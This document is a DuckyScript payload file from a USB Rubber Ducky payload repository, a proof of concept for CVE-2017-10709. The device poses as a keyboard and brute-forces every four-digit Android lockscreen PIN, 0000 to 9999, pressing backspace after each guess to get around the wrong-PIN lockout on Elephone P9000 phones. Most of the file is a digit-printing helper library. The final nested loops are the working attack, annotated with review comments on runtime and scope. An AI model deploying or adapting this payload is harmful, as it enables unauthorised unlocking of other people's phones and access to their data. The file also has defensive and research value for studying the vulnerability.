hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/mobile/Android/Android_HID_BruteForceCode/BruteForce4Backspace.txt
REM ATTACKMODE HID: the device presents itself to the target as a USB keyboard only.
ATTACKMODE HID
REM TITLE: Brute Force
REM AUTHOR: Cribbit
REM DESCRIPTION: POC of CVE-2017-10709 using a Ducky. The lockscreen on Elephone P9000 devices (running Android 6.0) allows physically proximate attackers to bypass a wrong-PIN lockout feature by pressing backspace after each PIN guess.
REM PROPS: Kalani & Shinichi Kudo
REM SCOPE: the loops at the end of this file enumerate four-digit numeric PINs
REM only (0000 through 9999) and never send ENTER.
REM NOTE(review): the description names a single device model and Android
REM build. A lockscreen that counts every rejected guess toward its lockout is
REM outside what this POC demonstrates - confirm affected and fixed builds
REM against the CVE-2017-10709 advisory rather than this file.
REM Wait 3 seconds before the first keystroke (presumably to let the target
REM finish enumerating the keyboard - the file does not say).
DELAY 3000
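EXTENSION TRANSLATE
    REM VERSION 1.0

    REM This extension acts as a library or collection of helper functions
    REM to work with converting variables in your payloads.
    REM WHY:
    REM One of the many ways to get information about the state of your payload
    REM is by injecting static strings, effectively as debugging prints.
    REM However, given the non-static nature of payloads using variables in
    REM DuckyScript 3.0 - the ability to decode variables during payload
    REM execution and print (inject) representations of their current state
    REM can often be a critically helpful development and debugging tool.

    REM Available Functions:
    REM TRANSLATE_INT() - var to decimal string - set $INPUT prior to call
    REM TRANSLATE_HEX() - var to hexadecimal string - set $INPUT prior to call
    REM TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call
    REM TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call

    REM USAGE:
    REM set $INPUT to desired var
    REM call the correct translate_ function for the expected data type e.g.
    REM VAR $myVar = 1234
    REM $INPUT = $myVar
    REM TRANSLATE_INT()
    REM REM the above code will inject 1234

    REM NOTE: TRANSLATE_INT, TRANSLATE_HEX and TRANSLATE_BINARY all modify
    REM $INPUT while they run (subtracting, dividing or shifting it), so the
    REM caller must reload $INPUT before every call.

    REM begin extension variables
    REM Digit alphabets understood by PRINTDIGIT().
    DEFINE PRINT_INT 0
    DEFINE PRINT_HEX 1
    VAR $DIGIT_PRINT_MODE = PRINT_INT
    REM $D   - the single digit value PRINTDIGIT() will type next.
    VAR $D = 0
    REM $IN  - declared here but not read or written anywhere in this extension.
    VAR $IN = 0
    REM $INPUT - the value to translate; set by the caller before each call.
    VAR $INPUT = 0
    REM $MOD - the place value (10000, 1000, 100, 10) CONSUME() is extracting.
    VAR $MOD = 0
    REM $P   - TRUE once a non-zero digit has been typed, so later zeros are
    REM        typed too instead of being dropped as leading zeros.
    VAR $P = FALSE
    REM $NL  - when TRUE every TRANSLATE_* function presses ENTER after its output.
    VAR $NL = TRUE
    REM end extension variables

    REM REQUIRED for INT/HEX - convert int to char
    REM Types the character for the digit held in $D. 0-9 are always typed.
    REM 10-15 are typed as A-F only when $DIGIT_PRINT_MODE is PRINT_HEX; in that
    REM mode a value above 15 types nothing. In any other mode a value above 9
    REM types "?".
    FUNCTION PRINTDIGIT()
        IF ($D == 0) THEN
            STRING 0
        ELSE IF ($D == 1) THEN
            STRING 1
        ELSE IF ($D == 2) THEN
            STRING 2
        ELSE IF ($D == 3) THEN
            STRING 3
        ELSE IF ($D == 4) THEN
            STRING 4
        ELSE IF ($D == 5) THEN
            STRING 5
        ELSE IF ($D == 6) THEN
            STRING 6
        ELSE IF ($D == 7) THEN
            STRING 7
        ELSE IF ($D == 8) THEN
            STRING 8
        ELSE IF ($D == 9) THEN
            STRING 9
        ELSE IF ($DIGIT_PRINT_MODE == PRINT_HEX) THEN
            IF ($D == 10) THEN
                STRING A
            ELSE IF ($D == 11) THEN
                STRING B
            ELSE IF ($D == 12) THEN
                STRING C
            ELSE IF ($D == 13) THEN
                STRING D
            ELSE IF ($D == 14) THEN
                STRING E
            ELSE IF ($D == 15) THEN
                STRING F
            END_IF
        ELSE
            STRING ?
        END_IF
    END_FUNCTION

    REM REQUIRED for INT/HEX - consumes a character / place from the input
    REM Counts how many times $MOD fits into $INPUT by repeated subtraction,
    REM leaving the remainder in $INPUT and the count in $D. The digit is typed
    REM when it is non-zero or when an earlier digit was already typed ($P).
    FUNCTION CONSUME()
        $D = 0
        WHILE ($INPUT >= $MOD)
            $D = ($D + 1)
            $INPUT = ($INPUT - $MOD)
        END_WHILE
        IF (($D > 0) || ($P == TRUE)) THEN
            $P = TRUE
            PRINTDIGIT()
        END_IF
    END_FUNCTION

    REM ENDIAN SWAPPER helper, (useful for working with VID/PID)
    REM Exchanges the low and high byte of the 16-bit value in $INPUT.
    FUNCTION SWAP_ENDIAN()
        $INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00))
    END_FUNCTION

    REM Translates a variable of presumed integer type and attempts to convert
    REM and inject a DECIMAL string representation
    REM Works from the ten-thousands place down to the tens place, skipping
    REM leading zeros, then always types the final ones digit. Presses ENTER
    REM afterwards when $NL is TRUE.
    FUNCTION TRANSLATE_INT()
        $DIGIT_PRINT_MODE = PRINT_INT
        $P = FALSE
        IF ( $INPUT >= 10000) THEN
            $MOD = 10000
            CONSUME()
        END_IF
        IF (($INPUT >= 1000) || ($P == TRUE)) THEN
            $MOD = 1000
            CONSUME()
        END_IF
        IF (($INPUT >= 100) || ($P == TRUE)) THEN
            $MOD = 100
            CONSUME()
        END_IF
        IF (($INPUT >= 10) || ($P == TRUE)) THEN
            $MOD = 10
            CONSUME()
        REM The original closed this block with "END_IF()"; the keyword takes
        REM no parentheses, as every other END_IF in this extension shows.
        END_IF
        REM Whatever is left in $INPUT is the ones digit.
        $D = $INPUT
        PRINTDIGIT()
        IF $NL THEN
            ENTER
        END_IF
    END_FUNCTION

    REM Translates a variable of presumed boolean type and attempts to convert
    REM and inject a BOOLEAN string representation
    REM Types TRUE when $INPUT is truthy, FALSE otherwise, then ENTER when
    REM $NL is TRUE.
    FUNCTION TRANSLATE_BOOL()
        IF $INPUT THEN
            STRING TRUE
        ELSE
            STRING FALSE
        END_IF
        IF $NL THEN
            ENTER
        END_IF
    END_FUNCTION

    REM Translates a variable of presumed integer type and attempts to convert
    REM and inject a HEX string representation
    REM Output is "0x" followed by four hex digits, zero-padded on the left.
    REM Digits are collected least-significant first into $d1..$d4 and typed
    REM back most-significant first.
    FUNCTION TRANSLATE_HEX()
        $DIGIT_PRINT_MODE = PRINT_HEX
        VAR $chars = 0
        VAR $d1 = 0
        VAR $d2 = 0
        VAR $d3 = 0
        VAR $d4 = 0
        WHILE ($INPUT > 0)
            IF ($chars == 0) THEN
                $d1 = ($INPUT % 16)
            ELSE IF ($chars == 1) THEN
                $d2 = ($INPUT % 16)
            ELSE IF ($chars == 2) THEN
                $d3 = ($INPUT % 16)
            ELSE IF ($chars == 3) THEN
                $d4 = ($INPUT % 16)
            END_IF
            $chars = ($chars + 1)
            $INPUT = ($INPUT / 16)
        END_WHILE
        REM $i is declared but never used in this function; kept as in the original.
        VAR $i = 0
        STRING 0x
        IF ($chars == 0) THEN
            REM The prefix was already typed above. The original typed "0x0000"
            REM here, which produced "0x0x0000" for an input of zero.
            STRING 0000
        ELSE IF ($chars == 1) THEN
            STRING 000
            $D = $d1
            PRINTDIGIT()
        ELSE IF ($chars == 2) THEN
            STRING 00
            $D = $d2
            PRINTDIGIT()
            $D = $d1
            PRINTDIGIT()
        ELSE IF ($chars == 3) THEN
            STRING 0
            $D = $d3
            PRINTDIGIT()
            $D = $d2
            PRINTDIGIT()
            $D = $d1
            PRINTDIGIT()
        ELSE IF ($chars == 4) THEN
            REM Four significant digits need no padding. The original typed an
            REM extra "0" here, giving five digits after the prefix.
            $D = $d4
            PRINTDIGIT()
            $D = $d3
            PRINTDIGIT()
            $D = $d2
            PRINTDIGIT()
            $D = $d1
            PRINTDIGIT()
        END_IF
        IF $NL THEN
            ENTER
        END_IF
    END_FUNCTION

    REM Translates a variable of presumed integer type and attempts to convert
    REM and inject a BINARY string representation
    REM Types 16 characters, most-significant bit first: the top bit (0x8000)
    REM is tested and $INPUT is shifted left by one on every pass.
    FUNCTION TRANSLATE_BINARY()
        VAR $I = 16
        WHILE ( $I > 0 )
            $I = ($I - 1)
            IF (($INPUT & 0x8000) == 0 ) THEN
                STRING 0
            ELSE
                STRING 1
            END_IF
            $INPUT = ($INPUT << 1)
        END_WHILE
        IF $NL THEN
            ENTER
        END_IF
    END_FUNCTION
END_EXTENSION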
REM Turn off TRANSLATE newline
REM With $NL FALSE, TRANSLATE_INT() types its digit and does not press ENTER,
REM so each call below injects exactly one character.
$NL = FALSE
REM One counter per PIN position, left to right. "Frist" and "Forth" are the
REM author's spellings of first and fourth.
VAR $Frist = 0
VAR $Second = 0
VAR $Third = 0
VAR $Forth = 0

REM Four nested loops walk every four-digit combination in ascending order,
REM 0000 through 9999 (10,000 candidates). Each loop types its own digit and
REM removes it again with one BACKSPACE before moving to the next value, so
REM only the positions that change are retyped.
REM
REM Points that matter when assessing exposure:
REM  - The script gets no feedback from the target. There is no success check
REM    and no stop condition; it types all 10,000 candidates regardless of
REM    what the device does.
REM  - DELAY 1000 runs once per candidate, so a full pass needs at least
REM    10,000 seconds (about 2 h 47 min) of uninterrupted USB keyboard access.
REM  - No ENTER is ever sent. NOTE(review): this presumably relies on the
REM    lockscreen evaluating the entry once four digits are present, with the
REM    BACKSPACE being the keystroke the CVE description refers to - confirm
REM    against the advisory.
WHILE ($Frist < 10)
    REM TRANSLATE_INT() changes $INPUT while printing, so $INPUT is reloaded
    REM before every call.
    $INPUT = $Frist
    TRANSLATE_INT()
    $Second = 0
    WHILE ($Second < 10)
        $INPUT = $Second
        TRANSLATE_INT()
        $Third = 0
        WHILE ($Third < 10)
            $INPUT = $Third
            TRANSLATE_INT()
            $Forth = 0
            WHILE ($Forth < 10)
                $INPUT = $Forth
                TRANSLATE_INT()
                $Forth = ($Forth + 1)
                REM Four digits are now on screen: wait one second, then erase
                REM the last digit.
                DELAY 1000
                BACKSPACE
            END_WHILE
            $Third = ($Third + 1)
            REM Erase the third digit before the next value is typed.
            BACKSPACE
        END_WHILE
        $Second = ($Second + 1)
        REM Erase the second digit.
        BACKSPACE
    END_WHILE
    $Frist = ($Frist + 1)
    REM Erase the first digit; the entry field is empty again.
    BACKSPACE
END_WHILE